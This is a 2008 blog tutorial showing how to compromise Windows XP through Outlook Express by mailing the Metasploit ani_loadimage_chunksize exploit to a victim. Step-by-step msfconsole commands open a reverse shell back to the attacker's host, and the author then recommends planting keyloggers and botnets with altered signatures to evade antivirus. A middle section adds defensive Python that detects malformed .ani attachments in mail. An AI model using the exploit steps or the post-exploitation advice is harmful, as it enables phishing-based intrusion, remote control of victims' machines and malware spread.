Defeating Windows XP (all versions) through Outlook Express

Ehhmmmm... finally writing again...

This time I'll demonstrate how to take over a Windows machine (all versions, fully patched, antivirus updated) by exploiting a weakness in Outlook Express.
This time I'm using the exploit ani_loadimage_chunksize, which happens to already be in Metasploit.
This exploit targets USER32.dll (the LoadAniIcon() function).
For details see http://downloads.securityfocus.com/vulnerabilities/exploits/ani_loadimage_chunksize2.rb
This exploit is remote, meaning the hacker can get a bind or reverse command prompt on the victim's computer.

Scenario:
The hacker sends a phishing email to the target. Once the target reads that email with Outlook Express, the hacker gets a bind command prompt on the victim's computer.
Here I'm using a Zimbra mail server on an openSUSE machine (172.18.3.188) with the domain
OK... here we go...

The Linux I'm using is BackTrack 3... my favourite Linux.

1. Checking the network connection

bt ~ # ifconfig eth0
eth0 Link encap:Ethernet HWaddr 00:0C:29:5C:65:69
inet addr:172.18.100.100 Bcast:172.18.255.255 Mask:255.255.0.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:40687 errors:0 dropped:0 overruns:0 frame:0
TX packets:728 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:4219258 (4.0 MiB) TX bytes:877329 (856.7 KiB)
Interrupt:16 Base address:0x2000

You can see that the attacker's IP is 172.18.100.100.


2. Move to the Metasploit directory

bt framework3 # cd /pentest/exploits/framework3
bt framework3 # ls
README framework3@ modules/ msfelfscan* msfpayload* scripts/
data/ karma.rc msfcli* msfencode* msfpescan* tools/
documentation/ lib/ msfconsole* msfgui* msfweb*
external/ load.gif msfd* msfopcode* plugins/
bt framework3 #

3. Run Metasploit

bt framework3 # ./msfconsole


__. .__. .__. __.
_____ _____/ |______ ____________ | | ____ |__|/ |_
/ \_/ __ \ __\__ \ / ___/\____ \| | / _ \| \ __\
| Y Y \ ___/| | / __ \_\___ \ | |_> > |_( ) || |
|__|_| /\___ >__| (____ /____ >| __/|____/\____/|__||__|
\/ \/ \/ \/ |__|

=[ msf v3.2-release
+ -- --=[ 294 exploits - 124 payloads
+ -- --=[ 17 encoders - 6 nops
=[ 58 aux

msf > use windows/email/ani_loadimage_chunksize
msf exploit(ani_loadimage_chunksize) > set PAYLOAD windows/shell_reverse_tcp
PAYLOAD => windows/shell_reverse_tcp
msf exploit(ani_loadimage_chunksize) > set RHOST ian.org
RHOST => ian.org
msf exploit(ani_loadimage_chunksize) > set LHOST 172.18.100.100
LHOST => 172.18.100.100
msf exploit(ani_loadimage_chunksize) > set LPORT 443
LPORT => 443
msf exploit(ani_loadimage_chunksize) >
msf exploit(ani_loadimage_chunksize) > set RPORT 25
RPORT => 25
msf exploit(ani_loadimage_chunksize) > set MAILFROM ian@hacking.com
MAILFROM => ian@hacking.com
msf exploit(ani_loadimage_chunksize) > set MAILTO laharisi@ian.org
MAILTO => laharisi@ian.org
msf exploit(ani_loadimage_chunksize) > exploit

Note:
MAILFROM : the hacker's email address
MAILTO : the victim's email address
RHOST : the victim's domain
LHOST : the hacker's machine address
PAYLOAD : windows/shell_reverse_tcp (reverse shell to the victim's command prompt)

4. When the exploit is run, it sends an email to the specified address.

msf exploit(ani_loadimage_chunksize) > exploit
[*] Started reverse handler
[*] Connecting to SMTP server ian.org:25...
[*] SMTP: 220 ian.ian.org ESMTP Postfix
[*] SMTP: 250-ian.ian.org
250-PIPELINING
250-SIZE 10240000
250-VRFY
250-ETRN
250-STARTTLS
250-ENHANCEDSTATUSCODES
250-8BITMIME
250 DSN
[*] SMTP: 250 2.1.0 Ok
[*] SMTP: 250 2.1.5 Ok
[*] Sending the message (701857 bytes)...
[*] SMTP: 354 End data with .
[*] SMTP: 250 2.0.0 Ok: queued as D7A17113913
[*] Closing the connection...
[*] SMTP: 221 2.0.0 Bye
[*] Waiting for a payload session (backgrounding)...
msf exploit(ani_loadimage_chunksize) >
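From the defender's side, what matters in the message sent above is the attachment: a RIFF animated-cursor (.ani) file whose anih header chunk declares a size other than the 36 bytes LoadAniIcon() expects. Mail gateways and endpoint scanners caught this class of file by validating the chunk layout instead of trusting the filename or Content-Type. The Python below is an added example written for this post, not code from the original post or from the Metasploit module: it parses the RIFF/ACON chunk list, flags anih chunks of the wrong size (and files carrying more than one anih), and walks every MIME part of a raw message to apply the same check to each decoded body. The RIFF/ACON layout and the 36-byte ANIHEADER size come from the public file-format description; the sample files, addresses and test message are constructed and carry no payload.

```python
"""Detect malformed .ani files of the kind LoadAniIcon() mishandled.

Added example for this walkthrough; not part of the original post or of the
Metasploit module. Sample data below is constructed for the detector only.
"""
import struct
from email import message_from_bytes
from email.mime.application import MIMEApplication
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText

# sizeof(ANIHEADER): the fixed-size header LoadAniIcon copies into a stack buffer.
ANIH_EXPECTED_SIZE = 36


def is_ani(data):
    """True if data is a RIFF container whose form type is ACON (animated cursor)."""
    return len(data) >= 12 and data[:4] == b"RIFF" and data[8:12] == b"ACON"


def iter_chunks(data, start, end, depth=0):
    """Yield (fourcc, offset, declared_size, depth) for chunks in data[start:end].

    Recurses into LIST chunks so an anih nested inside a list is also seen.
    """
    off = start
    while off + 8 <= end:
        fourcc = data[off:off + 4]
        size = struct.unpack_from("<I", data, off + 4)[0]
        yield fourcc, off, size, depth
        body = off + 8
        if fourcc == b"LIST" and body + 4 <= end:
            # LIST body = 4-byte list type followed by sub-chunks
            yield from iter_chunks(data, body + 4, min(body + size, end), depth + 1)
        off = body + size + (size & 1)  # RIFF chunks are word-aligned


def check_ani(data):
    """Return anomaly strings for an ANI file ([] if it looks sane); None if not ANI."""
    if not is_ani(data):
        return None
    findings = []
    anih_count = 0
    for fourcc, off, size, _depth in iter_chunks(data, 12, len(data)):
        if off + 8 + size > len(data):
            findings.append(f"chunk {fourcc!r} at offset {off} declares {size} bytes "
                            f"but only {len(data) - off - 8} remain")
        if fourcc == b"anih":
            anih_count += 1
            if size != ANIH_EXPECTED_SIZE:
                findings.append(f"anih chunk at offset {off} declares {size} bytes "
                                f"(expected {ANIH_EXPECTED_SIZE})")
    if anih_count == 0:
        findings.append("no anih header chunk")
    elif anih_count > 1:
        findings.append(f"{anih_count} anih chunks (a well-formed file has exactly one)")
    return findings


def scan_message(raw):
    """Run check_ani over every decoded MIME part of a raw RFC 5322 message.

    Sniffs the RIFF/ACON magic instead of trusting Content-Type or filename.
    Returns {part_index: findings} for parts that are ANI files with anomalies.
    """
    msg = message_from_bytes(raw)
    results = {}
    for idx, part in enumerate(msg.walk()):
        if part.is_multipart():
            continue
        findings = check_ani(part.get_payload(decode=True) or b"")
        if findings:  # None (not ANI) and [] (clean) are both skipped
            results[idx] = findings
    return results


def build_ani(chunks):
    """Constructed test helper: wrap (fourcc, body) pairs in a RIFF/ACON container."""
    body = b"".join(fourcc + struct.pack("<I", len(d)) + d + (b"\0" if len(d) & 1 else b"")
                    for fourcc, d in chunks)
    return b"RIFF" + struct.pack("<I", 4 + len(body)) + b"ACON" + body


# Constructed: a single 36-byte anih header, as a well-formed file has.
GOOD_ANI = build_ani([(b"anih", b"\0" * 36)])
# Constructed: a second anih with a size other than 36. Zero-filled; only the
# chunk shape matters, which is what the detector keys on.
BAD_ANI = build_ani([(b"anih", b"\0" * 36), (b"anih", b"\0" * 60)])


def build_test_message(attachment):
    """Constructed test helper: multipart mail with the file mislabelled as a JPEG."""
    msg = MIMEMultipart()
    msg["From"] = "sender@example.test"      # constructed address
    msg["To"] = "recipient@example.test"     # constructed address
    msg["Subject"] = "constructed test message"
    msg.attach(MIMEText("see attachment"))
    part = MIMEApplication(attachment, _subtype="octet-stream")
    part.add_header("Content-Disposition", "attachment", filename="photo.jpg")
    msg.attach(part)
    return msg.as_bytes()


if __name__ == "__main__":
    for name, sample in (("good", GOOD_ANI), ("bad", BAD_ANI)):
        print(name, check_ani(sample))
    print(scan_message(build_test_message(BAD_ANI)))
```

In a gateway you would feed scan_message() the raw message captured during the SMTP DATA phase and quarantine anything that yields findings; the magic-byte sniff matters because the attachment name and MIME type are under the sender's control.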

5. When the victim opens that email with Outlook Express, the victim's computer opens an UNPRIVILEGED PORT that connects back to the command prompt (remember the PAYLOAD above). kkkkkk..

6. What happens on the hacker's console? The hacker gets a session to the victim's computer with administrator rights.

msf exploit(ani_loadimage_chunksize) > [*] Command shell session 1 opened (172.18.100.100:443 -> 172.18.2.151:1039)
msf exploit(ani_loadimage_chunksize) > sessions -l

Active sessions
===============

Id Description Tunnel
-- ----------- ------
1 Command shell 172.18.100.100:443 -> 172.18.2.151:1039

7. Time to take over... just type sessions -i


msf exploit(ani_loadimage_chunksize) > sessions -i 1
[*] Starting interaction with 1...

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\master>
C:\Documents and Settings\master>ipconfig
ipconfig

Windows IP Configuration

Ethernet adapter Local Area Connection:

Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 172.18.2.151
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . : 172.18.2.1

C:\Documents and Settings\master>

Finally we get the victim's command prompt... uuhhhhhhhhh
Is the hacking over here? It's not over... the hacking has just begun.
After that the hacker can upload various programs, for example a keylogger, virus or worm. Personally I prefer to upload a BOTNET such as spybot or rx-bot aka spike, but don't forget to change the bot's signature so the antivirus doesn't recognise it. Configuring your own IRC server -> uploading the botnet -> ....??!! there's plenty more... I won't explain it... enough for now...

This tutorial was made for research purposes only... not to be used for anything destructive.

______________________________________________________________________________________________
This tutorial is dedicated to my sweetheart (H***Y)

Next tutorial: "upload backdoor, trojan, botnet"

Posted on September 15, 2008, in Hacking & security.
